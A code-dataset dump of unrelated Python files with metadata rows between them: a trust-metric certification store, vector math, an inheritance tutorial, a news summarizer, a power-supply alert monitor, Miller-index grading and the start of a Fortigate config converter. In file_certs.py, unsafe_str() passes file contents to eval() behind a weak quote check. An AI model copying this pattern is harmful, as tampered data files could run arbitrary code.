#!/usr/bin/env python """ file_certs.py: File-based Trust Metric Profiles (example code) Copyright (C) 2001 Luke Kenneth Casson Leighton <lkcl@samba-tng.org> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA File-based Profiles on which certifications (also file-based) can be stored and retrieved for evaluation by Trust Metrics. ...with NO LOCKING! ...yet. unfortunately, type info of non-string profile names is lost on the [very basic] file-format. so, whilst the trust metric and net flow evaluation code couldn't care less what the type of its nodes is, the file storage does. *shrug*. who wants to be a number, anyway. WARNING: there is a lot of class-context overloading in this demonstration code, particularly DictCertifications and FileCertifications get reused rather inappropriately. ... but it will do, as a simple example. [i'll get round to doing a SQL and an XML one, later, properly]. """ from certs import DictCertifications, CertInfo from profile import Profile from string import join from os import makedirs, path # deal with having to store strings as text. *sigh* def unsafe_str(s): s = s.strip() if s[0] != "'" and s[0] != '"': # paranoia. don't want code from file evaluated! # if someone edits a file and removes the first # quote but not the second, TOUGH. s = '"""'+s+'"""' return eval(s) # yes, we _do_ want the quotes. # they get removed by unsafe_str, above, on retrieval. def safe_str(s): return repr(str(s)) class FileCertifications(DictCertifications): """ Certification file of format: certname1: user1=level1, user2=level2, ... certname2: user1=level1, user2=level2, ... 
""" def set_filename(self, file): self.f = file try: p, f = path.split(file) makedirs(p) except: pass def __read_dict(self): self.info = {} try: f = open(self.f,"rw") except: return for l in f.readlines(): l = l.strip() if len(l) == 0: continue [ftype, certs] = l.split(":") ftype = unsafe_str(ftype) certs = certs.split(",") for cert in certs: [fname, flevel] = cert.split("=") l = unsafe_str(flevel) fn = unsafe_str(fname) DictCertifications.add(self, ftype, fn, l) f.close() def __write_dict(self): f = open(self.f,"w") for key in DictCertifications.cert_keys(self): l = safe_str(key)+": " certs = [] dict = DictCertifications.certs_by_type(self, key) for c in dict.keys(): certs.append(safe_str(c)+"="+safe_str(dict[c])) l += join(certs, ", ") + "\n" f.write(l) f.close() def cert_keys(self): self.__read_dict() return DictCertifications.cert_keys(self) def certs_by_type(self, type): self.__read_dict() return DictCertifications.certs_by_type(self, type) def cert_type_keys(self, type, name): self.__read_dict() return DictCertifications.certs_type_keys(self, type, name) def add(self, type, name, level): self.__read_dict() DictCertifications.add(self, type, name, level) self.__write_dict() def remove(self, type, name): self.__read_dict() DictCertifications.remove(self, type, name, level) self.__write_dict() def cert_level(self, type, name): self.__read_dict() return DictCertifications.cert_level(self, type, name) class FileProfile(Profile): def __init__(self, name, CertClass): Profile.__init__(self, name, CertClass) self._certs_by_subj.set_filename("users/"+str(name)+"/certs.subj") self._certs_by_issuer.set_filename("users/"+str(name)+"/certs.issuer") # overload meaning of FileCertifications here to store user-profile. self.info = FileCertifications() self.info.set_filename("users/"+str(name)+"/profile") def set_filename(self, file): self.info.set_filename(file) def info_keys(self): return self.info.cert_keys() def infos_by_type(self, type): return self.info.certs_by_type(type) def info_type_keys(self, type, name): return self.info.certs_type_keys(type, name) def add(self, type, name, level): self.info.add(type, name, level) def remove(self, type, name): self.info.remove(type, name, level) def info_index(self, type, name): return self.info.cert_level(type, name) class FileCertInfo(CertInfo): """ This is probably some of the clumsiest code ever written. overload DictCertification - because it's been a really good, lazy weekend, to store an unordered list (seeds), an ordered list (levels) etc. yuck. please, someone shoot me or do a better job, _esp._ for example code. """ def cert_seeds(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) # clumsy usage of a dictionary as an unordered list. argh. d = d.certs_by_type("seeds") return d.keys() def cert_levels(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) dict = d.certs_by_type("levels") # clumsy usage of a dictionary into an ordered list. argh. 
keys = dict.keys() l = [None] * len(keys) for idx in keys: l[int(idx)] = dict[idx] return l def cert_level_default(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) [d] = d.certs_by_type("default level").keys() return d def cert_level_min(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) [d] = d.certs_by_type("min level").keys() return d def cert_tmetric_type(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) [d] = d.certs_by_type("type").keys() return d def add_cert_seed(self, idxn, seed): d = FileCertifications() d.set_filename("certs/"+str(idxn)) # clumsy usage of a dictionary as an unordered list. argh. return d.add("seeds", seed, None) def add_cert_level(self, idxn, level, index): d = FileCertifications() d.set_filename("certs/"+str(idxn)) # clumsy usage of a dictionary as an index-ordered list. argh. return d.add("levels", index, level) def set_cert_level_default(self, idxn, dflt_level): d = FileCertifications() d.set_filename("certs/"+str(idxn)) return d.add("default level", dflt_level, None) def set_cert_level_min(self, idxn, min_level): d = FileCertifications() d.set_filename("certs/"+str(idxn)) return d.add("min level", min_level, None) def set_cert_tmetric_type(self, idxn, type): d = FileCertifications() d.set_filename("certs/"+str(idxn)) return d.add("type", type, None) def test(): from profile import Profiles from tm_calc import PymTrustMetric from pprint import pprint f = FileCertInfo() f.add_cert_seed('like', '55') f.add_cert_seed('like', 'luke') f.add_cert_level('like', 'none', 0) f.add_cert_level('like', "don't care", 1) f.add_cert_level('like', 'good', 2) f.add_cert_level('like', 'best', 3) f.set_cert_level_default('like', "don't care") f.set_cert_level_min('like', 'none') f.set_cert_tmetric_type('like', 'to') f.add_cert_seed('hate', 'heather') f.add_cert_seed('hate', '10') f.add_cert_level('hate', 'none', 0) f.add_cert_level('hate', "don't care", 1) f.add_cert_level('hate', 'dislike', 2) f.add_cert_level('hate', 'looks CAN kill', 3) f.set_cert_level_default('hate', "don't care") f.set_cert_level_min('hate', 'none') f.set_cert_tmetric_type('hate', 'to') p = Profiles(FileProfile, FileCertifications) r = p.add_profile('luke') r.add("name", 0, "luke") r.add("name", 1, "kenneth") r.add("name", 2, "casson") r.add("name", 3, "leighton") r.add("info", 0, "likes python a lot - thinks it's really cool") r.add("info", 1, "groks network traffic like he has a built-in headsocket") p.add_profile('heather') p.add_profile('bob') p.add_profile('mary') p.add_profile('lesser fleas') p.add_profile('little fleas') p.add_profile('fleas') p.add_profile('robbie the old crock pony') p.add_profile('tart the flat-faced persian cat') p.add_profile('mo the mad orange pony') p.add_profile('55') p.add_profile('10') p.add_profile('2') p.add_profile('fleas ad infinitum') p.add_cert('luke', 'like', 'heather', 'best') p.add_cert('heather', 'like', 'luke', 'best') p.add_cert('heather', 'like', 'robbie the old crock pony', 'best') p.add_cert('heather', 'like', 'tart the flat-faced persian cat', 'best') p.add_cert('heather', 'like', 'mo the mad orange pony', 'best' ) p.add_cert('bob', 'like', 'mary', 'good') p.add_cert('bob', 'like', 'heather', 'good') p.add_cert('mary', 'like', 'bob', 'good') p.add_cert('fleas', 'like', 'little fleas', 'good') p.add_cert('little fleas', 'like', 'lesser fleas', 'best') p.add_cert('lesser fleas', 'like', 'fleas ad infinitum', 'best') p.add_cert('robbie the old crock pony', 'like', 'fleas', 'best') 
p.add_cert('55', 'like', '10', 'none') p.add_cert('10', 'like', '2', 'best') p.add_cert('heather', 'hate', 'bob', 'dislike' ) p.add_cert('heather', 'hate', 'fleas', 'looks CAN kill' ) p.add_cert('fleas', 'hate', 'mary', 'dislike') p.add_cert('10', 'hate', '55', 'looks CAN kill') t = PymTrustMetric(f, p) r = t.tmetric_calc('like') pprint(r) r = t.tmetric_calc('like', ['heather']) pprint(r) r = t.tmetric_calc('hate') pprint(r) if __name__ == '__main__': test()
gpl-2.0
-2,231,080,821,749,822,500
27.943452
77
0.668072
false
2.744074
false
false
false
natduca/ndbg
util/vec2.py
1
3522
# Copyright 2011 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import math class vec2(object): def __init__(self, opt_a=None,opt_b=None): if opt_a != None and opt_b != None: self.x = float(opt_a) self.y = float(opt_b) elif opt_a != None: self.x = float(opt_a.x) self.y = float(opt_a.y) else: self.x = 0 self.y = 0 def set(self,a,opt_b=None): if opt_b != None: self.x = float(a) self.y = float(opt_b) else: self.x = float(a.x) self.y = float(a.y) def __str__(self): return "(%f,%f)" % (self.x,self.y) def vec2_add(a,b): dst = vec2() dst.x = a.x + b.x dst.y = a.y + b.y return dst def vec2_accum(a,b): a.x += b.x a.y += b.y return a def vec2_sub(a,b): dst = vec2() dst.x = a.x - b.x dst.y = a.y - b.y return dst def vec2_neg_accum(a,b): a.x -= b.x a.y -= b.y return a def vec2_scale(a,scale): dst = vec2() dst.x = a.x * scale dst.y = a.y * scale return dst def vec2_scale_inplace(a,scale): a.x *= scale a.y *= scale return a def vec2_piecewise_mul(a,b): dst = vec2() dst.x = a.x * b.x dst.y = a.y * b.y return dst def vec2_piecewise_div(a,b): dst = vec2() dst.x = a.x / b.x dst.y = a.y / b.y return dst def vec2_dot(a,b): return a.x * b.x + a.y * b.y def vec2_length(a): return math.sqrt(vec2_dot(a,a)) def vec2_length_sqared(a): return vec2_dot(a,a) def vec2_normalize(a): s = 1/vec2_length(a) return vec2_scale(a,s) def vec2_normalize_inplace(dst): s = 1/vec2_length(dst) dst.x *= s dst.y *= s return dst def vec2_interp(a,b,factor): delta = vec2_sub(b,a) vec2_scale_inplace(delta,factor) vec2_accum(delta,a) return delta def vec2_distance(a,b): return vec2_length(vec2_sub(b,a)) class rect(object): def __init__(self,opt_a=None,opt_b=None,centered=False): if opt_a and opt_b: self.pos = vec2(opt_a) self.size = vec2(opt_b) elif opt_a == None and opt_b == None: self.pos = vec2(0,0) self.size = vec2(0,0) else: raise Exception("Need two args or none") if centered: hsize = vec2_scale(self.size,0.5) self.pos = vec2_sub(self.pos,hsize) def contains(self,v): return v.x >= self.pos.x and v.x < self.pos.x + self.size.x and v.y >= self.pos.y and v.y < self.pos.y + self.size.y ########################################################################### class ivec2(object): def __init__(self, opt_a=None,opt_b=None): if opt_a != None and opt_b != None: self.x = int(opt_a) self.y = int(opt_b) elif opt_a != None: self.x = int(opt_a.x) self.y = int(opt_a.y) else: self.x = 0 self.y = 0 def set(self,a,opt_b=None): if opt_b != None: self.x = int(a) self.y = int(opt_b) else: self.x = int(a.x) self.y = int(a.y) def __str__(self): return "(%i,%i)" % (self.x,self.y)
apache-2.0
5,074,446,273,003,439,000
20.47561
121
0.561045
false
2.676292
false
false
false
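The vec2 record above exposes the vector operations as free functions rather than operator overloads, so they compose like the short sketch below; the values are illustrative:

# Hedged sketch using the helpers defined in the record above.
a = vec2(1.0, 2.0)
b = vec2(4.0, 6.0)
print(vec2_add(a, b))          # (5.000000,8.000000)
print(vec2_distance(a, b))     # 5.0
print(vec2_interp(a, b, 0.5))  # (2.500000,4.000000)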
KT26/PythonCourse
8. Class/8.py
1
1268
# Created by PyCharm Pro Edition
# User: Kaushik Talukdar
# Date: 24-04-17
# Time: 12:29 AM

# INHERITANCE
# We can create a new class, but instead of writing it from scratch, we can base it on an existing class.
# Let's understand inheritance better with an example


class Car():
    def __init__(self, make, model, year):
        self.make = make
        self.model = model
        self.year = year
        self.mileage = 0

    def get_descriptive_name(self):
        full_name = self.make.title() + ' ' + self.model.title() + ' ' + str(self.year)
        return full_name

    def update_odometer(self, mileage):
        self.mileage = mileage


# The class below is an inherited class derived from Car and has access to Car's variables as well as its methods.
# The parent class name must appear in parentheses in the child class for inheritance to work.
# The super() call is responsible for providing the child class with all the variables and methods of the parent class.

class ElectricCar(Car):
    def __init__(self, make, model, year):
        super().__init__(make, model, year)


my_car = ElectricCar('Tesla', 'Model S', '2017')

car = my_car.get_descriptive_name()
print(car)
mit
-6,550,018,117,725,046,000
31.368421
116
0.630126
false
3.612536
false
false
false
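Since the record above is a lesson on inheritance and super(), a natural follow-on (not part of the original course file) is the child class adding its own attribute and method on top of what it inherits:

# Illustrative extension of the ElectricCar example above; battery_size and
# describe_battery() are hypothetical additions, not part of the course file.
class ElectricCar(Car):
    def __init__(self, make, model, year):
        super().__init__(make, model, year)
        self.battery_size = 70                  # attribute only the child class has

    def describe_battery(self):
        print("This car has a " + str(self.battery_size) + "-kWh battery.")


my_car = ElectricCar('Tesla', 'Model S', '2017')
print(my_car.get_descriptive_name())            # inherited from Car
my_car.describe_battery()                       # defined only on ElectricCar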
Faeriol/news-summarizer
summarizer.py
1
3274
import os from goose3 import Goose from selenium import webdriver from selenium.common.exceptions import UnexpectedAlertPresentException, SessionNotCreatedException, WebDriverException from sumy.parsers.plaintext import PlaintextParser from sumy.nlp.tokenizers import Tokenizer from sumy.summarizers.lsa import LsaSummarizer as Summarizer from sumy.nlp.stemmers import Stemmer from sumy.utils import get_stop_words os.environ['MOZ_HEADLESS'] = '1' # Should be moved out LANGUAGE = "english" # Should be config option class NotEnoughContent(Exception): def __init__(self, url: str) -> None: super().__init__("Not enough content for: {}".format(url)) class InvalidContent(Exception): def __init__(self, url: str) -> None: super().__init__("Content appears invalid for: {}".format(url)) class BrowserSummarizer(object): def __init__(self, language: str, sentence_count: int) -> None: self.language = language self.sentence_count = sentence_count self.browser = None self.goose = Goose({"enable_image_fetching": False}) self.stemmer = Stemmer(language) self.tokenizer = Tokenizer(language) self.summarizer = Summarizer(self.stemmer) self.summarizer.stop_words = get_stop_words(language) def init(self) -> None: if self.browser: self.done() self.browser = webdriver.Firefox() def __enter__(self): self.init() return self def __exit__(self, *args): self.done() def _blank(self): """ Empty browser, do not kill instance """ try: self.browser.get("about:blank") except UnexpectedAlertPresentException: self.browser.switch_to.alert() self.browser.switch_to.alert().dismiss() def parse_url(self, url: str) -> (str, str): """ Parse retrieve the given url and parse it. :param url: The URL to parse :return: The resolved URL, the parsed content """ try: self.browser.get(url) except UnexpectedAlertPresentException: self.browser.switch_to.alert() self.browser.switch_to.alert().dismiss() self.browser.get(url) except WebDriverException: raise InvalidContent(url) try: # Move around any alerts self.browser.switch_to.alert() self.browser.switch_to.alert().dismiss() except Exception: pass try: contents = self.goose.extract(raw_html=self.browser.page_source) cleaned_url = self.browser.current_url except IndexError: raise InvalidContent(url) finally: self._blank() parser = PlaintextParser.from_string(contents.cleaned_text, self.tokenizer) sentences = self.summarizer(parser.document, self.sentence_count) if len(sentences) < self.sentence_count: raise NotEnoughContent(url) return cleaned_url, " ".join(str(sentence) for sentence in sentences) def done(self) -> None: self.browser.close() try: self.browser.quit() except SessionNotCreatedException: pass self.browser = None
mit
-2,505,183,108,841,201,700
32.408163
118
0.626145
false
4.082294
false
false
false
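BrowserSummarizer in the record above is a context manager around headless Firefox plus goose3 extraction and sumy LSA summarization. A hedged usage sketch; the URL is illustrative, and geckodriver plus the NLP dependencies must be installed for it to run:

# Hedged sketch of driving the BrowserSummarizer class defined above.
with BrowserSummarizer(LANGUAGE, sentence_count=3) as summarizer:
    try:
        resolved_url, summary = summarizer.parse_url('https://example.com/article')
        print(resolved_url)
        print(summary)
    except (NotEnoughContent, InvalidContent) as exc:
        print(exc)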
corerd/PyDomo
powerman/pwrmonitor.py
1
6768
#!/usr/bin/env python # # The MIT License (MIT) # # Copyright (c) 2019 Corrado Ubezio # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from __future__ import print_function import logging import json import inspect from sys import stderr from time import strftime from datetime import datetime from os.path import dirname, join from apiclient import errors from traceback import format_exc from powerman.upower import UPowerManager from cloud.upload import upload_datastore from cloud.googleapis.gmailapi import gmSend from cloud.cloudcfg import ConfigDataLoad, checkDatastore # Globals VERSION = '1.0' VERSION_DATE = '2019' # Claud configuration file get from cloud package DEFAULT_CFG_FILE = 'cloudcfg.json' DEFAULT_CFG_FILE_PATH = join(dirname(inspect.getfile(ConfigDataLoad)), DEFAULT_CFG_FILE) # Power supply type IDs PSU_UNKNOWN = -1 PSU_AC = 0 PSU_BATTERY = 1 # Power supply type string description PSU_AC_DESC = "AC_ADAPTER" PSU_BATTERY_DESC = "BATTERY" # Files keeping power supply state LOG_FILE = 'pwrmonitor-log.txt' PSU_TYPE_FILE = 'pwrmonitor.json' DEFAULT_PSU_CFG = \ { 'power-supply': 'UNKNOWN' } USAGE = '''Check power supply type and if it is switched to battery then send an email alert message from the user's Gmail account. Data are logged in CSV format: datetime;city;temperature Email address of the receiver and datastore path are taken from a configuration file in JSON format. 
If none is given, the configuration is read from the file: %s ''' % DEFAULT_CFG_FILE_PATH def print_error(msg): print('%s;%s' % (strftime("%Y-%m-%d %H:%M:%S"), msg), file=stderr) def psu_type_getFromCfg(cfg_data): """Get the power supply type from configuration data Args: cfg_data: PSU configuration data Returns: PSU_UNKNOWN PSU_AC PSU_BATTERY """ psu_type_desc = cfg_data['power-supply'] if psu_type_desc == PSU_BATTERY_DESC: return PSU_BATTERY elif psu_type_desc == PSU_AC_DESC: return PSU_AC return PSU_UNKNOWN def psu_type_getFromDevice(): """Get the power supply type from UPowerManager Returns: PSU_AC PSU_BATTERY """ pwrMan = UPowerManager() # Get the Devices List searching for a battery battery_device = None for dev in pwrMan.detect_devices(): if 'battery' in dev: battery_device = dev break if not battery_device: # no battery device found: # power supply is external return PSU_AC if 'discharg' in pwrMan.get_state(battery_device).lower(): # The battery power allowd states: # "Unknown" # "Loading" (that is Charging) # "Discharging" # "Empty" # "Fully charged" # "Pending charge" # "Pending discharge" return PSU_BATTERY return PSU_AC def alert_send(to, message_text): """Send an alert email message from the user's account to the email address get from the configuration file. Args: to: Email address of the receiver. message_text: The text of the alert message. Returns: Success. """ subject = 'PSU Alert at ' + datetime.now().strftime("%d-%m-%Y %H:%M:%S") success = -1 try: gmSend(to, subject, message_text) except errors.HttpError as e: logging.error('HttpError occurred: %s' % e) except Exception: logging.error(format_exc()) else: logging.info(message_text) success = 0 return success def main(): print('pwrmonitor v%s - (C) %s' % (VERSION, VERSION_DATE)) # get the configuration data try: cloud_cfg = ConfigDataLoad(DEFAULT_CFG_FILE_PATH) except Exception as e: print_error('cloud configuration: unable to load %s' % DEFAULT_CFG_FILE_PATH) print_error('cloud configuration exception: %s' % type(e).__name__) print_error('cloud configuration: %s' % str(e)) return -1 try: log_file = join(cloud_cfg.data['datastore'], LOG_FILE) except KeyError: print_error("Keyword 'datastore' not found in file %s" % DEFAULT_CFG_FILE_PATH) return -1 try: receiver_address = cloud_cfg.data['alert-receiver-address'] except KeyError: print_error("Keyword 'alert-receiver-address' not found in file %s" % DEFAULT_CFG_FILE_PATH) return -1 # logger setup if checkDatastore(log_file) is not True: print_error("Cannot access %s directory" % cloud_cfg.data['datastore']) return -1 logging.basicConfig(filename=log_file, format='%(asctime)s;%(levelname)s;%(message)s', level=logging.DEBUG) # check PSU type psu_switch2battery = 0 psu_cfg_file = join(cloud_cfg.data['datastore'], PSU_TYPE_FILE) psu_cfg = ConfigDataLoad(psu_cfg_file, DEFAULT_PSU_CFG) psu_type_prev = psu_type_getFromCfg(psu_cfg.data) psu_type_current = psu_type_getFromDevice() if psu_type_current != psu_type_prev: if psu_type_current == PSU_BATTERY: psu_type_desc = PSU_BATTERY_DESC else: psu_type_desc = PSU_AC_DESC logging.info('power supply switched to {}'.format(psu_type_desc)) psu_cfg.data['power-supply'] = psu_type_desc psu_cfg.update() if psu_type_current == PSU_BATTERY: psu_switch2battery = 1 logging.debug('send alert') alert_send(receiver_address, 'AC power adapter has been unplugged.') upload_datastore(cloud_cfg.data['datastore']) return psu_switch2battery if __name__ == "__main__": exit(main())
mit
-1,850,814,616,450,463,200
30.18894
85
0.655585
false
3.644588
true
false
false
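The detection logic in the record above boils down to: look for a UPower battery device, and treat a "discharging" state as running on battery. The same check in isolation, as a hedged sketch that assumes the UPowerManager wrapper imported above and a reachable UPower D-Bus service:

# Hedged sketch of the battery check used by psu_type_getFromDevice() above.
pwr = UPowerManager()
battery = next((dev for dev in pwr.detect_devices() if 'battery' in dev), None)

if battery is None:
    print('No battery device found: running on AC power.')
elif 'discharg' in pwr.get_state(battery).lower():
    print('Battery is discharging: the AC adapter looks unplugged.')
else:
    print('Battery present and charging or full.')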
jolyonb/edx-platform
common/lib/chem/chem/miller.py
1
9303
""" Calculation of Miller indices """ from __future__ import absolute_import import decimal import fractions as fr import json import math import numpy as np from six.moves import map from six.moves import range from functools import reduce def lcm(a, b): """ Returns least common multiple of a, b Args: a, b: floats Returns: float """ return a * b / fr.gcd(a, b) def segment_to_fraction(distance): """ Converts lengths of which the plane cuts the axes to fraction. Tries convert distance to closest nicest fraction with denominator less or equal than 10. It is purely for simplicity and clearance of learning purposes. Jenny: 'In typical courses students usually do not encounter indices any higher than 6'. If distance is not a number (numpy nan), it means that plane is parallel to axis or contains it. Inverted fraction to nan (nan is 1/0) = 0 / 1 is returned Generally (special cases): a) if distance is smaller than some constant, i.g. 0.01011, than fraction's denominator usually much greater than 10. b) Also, if student will set point on 0.66 -> 1/3, so it is 333 plane, But if he will slightly move the mouse and click on 0.65 -> it will be (16,15,16) plane. That's why we are doing adjustments for points coordinates, to the closest tick, tick + tick / 2 value. And now UI sends to server only values multiple to 0.05 (half of tick). Same rounding is implemented for unittests. But if one will want to calculate miller indices with exact coordinates and with nice fractions (which produce small Miller indices), he may want shift to new origin if segments are like S = (0.015, > 0.05, >0.05) - close to zero in one coordinate. He may update S to (0, >0.05, >0.05) and shift origin. In this way he can receive nice small fractions. Also there is can be degenerated case when S = (0.015, 0.012, >0.05) - if update S to (0, 0, >0.05) - it is a line. This case should be considered separately. Small nice Miller numbers and possibility to create very small segments can not be implemented at same time). Args: distance: float distance that plane cuts on axis, it must not be 0. Distance is multiple of 0.05. Returns: Inverted fraction. 0 / 1 if distance is nan """ if np.isnan(distance): return fr.Fraction(0, 1) else: fract = fr.Fraction(distance).limit_denominator(10) return fr.Fraction(fract.denominator, fract.numerator) def sub_miller(segments): ''' Calculates Miller indices from segments. Algorithm: 1. Obtain inverted fraction from segments 2. Find common denominator of inverted fractions 3. Lead fractions to common denominator and throws denominator away. 4. Return obtained values. Args: List of 3 floats, meaning distances that plane cuts on x, y, z axes. Any float not equals zero, it means that plane does not intersect origin, i. e. shift of origin has already been done. Returns: String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2) ''' fracts = [segment_to_fraction(segment) for segment in segments] common_denominator = reduce(lcm, [fract.denominator for fract in fracts]) miller_indices = ([ fract.numerator * math.fabs(common_denominator) / fract.denominator for fract in fracts ]) return'(' + ','.join(map(str, list(map(decimal.Decimal, miller_indices)))) + ')' def miller(points): """ Calculates Miller indices from points. Algorithm: 1. Calculate normal vector to a plane that goes trough all points. 2. Set origin. 3. Create Cartesian coordinate system (Ccs). 4. Find the lengths of segments of which the plane cuts the axes. Equation of a line for axes: Origin + (Coordinate_vector - Origin) * parameter. 5. 
If plane goes trough Origin: a) Find new random origin: find unit cube vertex, not crossed by a plane. b) Repeat 2-4. c) Fix signs of segments after Origin shift. This means to consider original directions of axes. I.g.: Origin was 0,0,0 and became new_origin. If new_origin has same Y coordinate as Origin, then segment does not change its sign. But if new_origin has another Y coordinate than origin (was 0, became 1), than segment has to change its sign (it now lies on negative side of Y axis). New Origin 0 value of X or Y or Z coordinate means that segment does not change sign, 1 value -> does change. So new sign is (1 - 2 * new_origin): 0 -> 1, 1 -> -1 6. Run function that calculates miller indices from segments. Args: List of points. Each point is list of float coordinates. Order of coordinates in point's list: x, y, z. Points are different! Returns: String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2) """ N = np.cross(points[1] - points[0], points[2] - points[0]) O = np.array([0, 0, 0]) P = points[0] # point of plane Ccs = list(map(np.array, [[1.0, 0, 0], [0, 1.0, 0], [0, 0, 1.0]])) segments = ([ np.dot(P - O, N) / np.dot(ort, N) if np.dot(ort, N) != 0 else np.nan for ort in Ccs ]) if any(x == 0 for x in segments): # Plane goes through origin. vertices = [ # top: np.array([1.0, 1.0, 1.0]), np.array([0.0, 0.0, 1.0]), np.array([1.0, 0.0, 1.0]), np.array([0.0, 1.0, 1.0]), # bottom, except 0,0,0: np.array([1.0, 0.0, 0.0]), np.array([0.0, 1.0, 0.0]), np.array([1.0, 1.0, 1.0]), ] for vertex in vertices: if np.dot(vertex - O, N) != 0: # vertex not in plane new_origin = vertex break # obtain new axes with center in new origin X = np.array([1 - new_origin[0], new_origin[1], new_origin[2]]) Y = np.array([new_origin[0], 1 - new_origin[1], new_origin[2]]) Z = np.array([new_origin[0], new_origin[1], 1 - new_origin[2]]) new_Ccs = [X - new_origin, Y - new_origin, Z - new_origin] segments = ([np.dot(P - new_origin, N) / np.dot(ort, N) if np.dot(ort, N) != 0 else np.nan for ort in new_Ccs]) # fix signs of indices: 0 -> 1, 1 -> -1 ( segments = (1 - 2 * new_origin) * segments return sub_miller(segments) def grade(user_input, correct_answer): ''' Grade crystallography problem. Returns true if lattices are the same and Miller indices are same or minus same. E.g. (2,2,2) = (2, 2, 2) or (-2, -2, -2). Because sign depends only on student's selection of origin. Args: user_input, correct_answer: json. Format: user_input: {"lattice":"sc","points":[["0.77","0.00","1.00"], ["0.78","1.00","0.00"],["0.00","1.00","0.72"]]} correct_answer: {'miller': '(00-1)', 'lattice': 'bcc'} "lattice" is one of: "", "sc", "bcc", "fcc" Returns: True or false. ''' def negative(m): """ Change sign of Miller indices. Args: m: string with meaning of Miller indices. E.g.: (-6,3,-6) -> (6, -3, 6) Returns: String with changed signs. """ output = '' i = 1 while i in range(1, len(m) - 1): if m[i] in (',', ' '): output += m[i] elif m[i] not in ('-', '0'): output += '-' + m[i] elif m[i] == '0': output += m[i] else: i += 1 output += m[i] i += 1 return '(' + output + ')' def round0_25(point): """ Rounds point coordinates to closest 0.5 value. Args: point: list of float coordinates. Order of coordinates: x, y, z. 
Returns: list of coordinates rounded to closes 0.5 value """ rounded_points = [] for coord in point: base = math.floor(coord * 10) fractional_part = (coord * 10 - base) aliquot0_25 = math.floor(fractional_part / 0.25) if aliquot0_25 == 0.0: rounded_points.append(base / 10) if aliquot0_25 in (1.0, 2.0): rounded_points.append(base / 10 + 0.05) if aliquot0_25 == 3.0: rounded_points.append(base / 10 + 0.1) return rounded_points user_answer = json.loads(user_input) if user_answer['lattice'] != correct_answer['lattice']: return False points = [list(map(float, p)) for p in user_answer['points']] if len(points) < 3: return False # round point to closes 0.05 value points = [round0_25(point) for point in points] points = [np.array(point) for point in points] # print miller(points), (correct_answer['miller'].replace(' ', ''), # negative(correct_answer['miller']).replace(' ', '')) if miller(points) in (correct_answer['miller'].replace(' ', ''), negative(correct_answer['miller']).replace(' ', '')): return True return False
agpl-3.0
2,638,268,032,322,332,000
32.584838
122
0.5868
false
3.622664
false
false
false
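The core trick in the record above is segment_to_fraction plus clearing denominators: invert each axis intercept as a small fraction, then multiply by the least common multiple of the denominators. A standalone sketch of that arithmetic with the standard library; the intercepts are illustrative and math.lcm needs Python 3.9+:

# Hedged sketch of the invert-and-clear-denominators step used by miller() above.
import math
from fractions import Fraction

intercepts = [0.5, 1.0, float('nan')]        # nan = plane parallel to that axis

inverted = [Fraction(0, 1) if math.isnan(d)
            else 1 / Fraction(d).limit_denominator(10)
            for d in intercepts]

common = math.lcm(*(f.denominator for f in inverted))
indices = [int(f * common) for f in inverted]
print(indices)                               # [2, 1, 0] -> the (210) plane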
maaaaz/fgpoliciestocsv
fgaddressestocsv.py
1
6306
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # This file is part of fgpoliciestocsv. # # Copyright (C) 2014, 2020, Thomas Debize <tdebize at mail.com> # All rights reserved. # # fgpoliciestocsv is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # fgpoliciestocsv is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with fgpoliciestocsv. If not, see <http://www.gnu.org/licenses/>. from __future__ import absolute_import from __future__ import division from __future__ import print_function from os import path import io import sys import re import csv import os # OptionParser imports from optparse import OptionParser from optparse import OptionGroup # Options definition parser = OptionParser(usage="%prog [options]") main_grp = OptionGroup(parser, 'Main parameters') main_grp.add_option('-i', '--input-file', help='Partial or full Fortigate configuration file. Ex: fgfw.cfg') main_grp.add_option('-o', '--output-file', help='Output csv file (default ./addresses-out.csv)', default=path.abspath(path.join(os.getcwd(), './addresses-out.csv'))) main_grp.add_option('-s', '--skip-header', help='Do not print the csv header', action='store_true', default=False) main_grp.add_option('-n', '--newline', help='Insert a newline between each group for better readability', action='store_true', default=False) 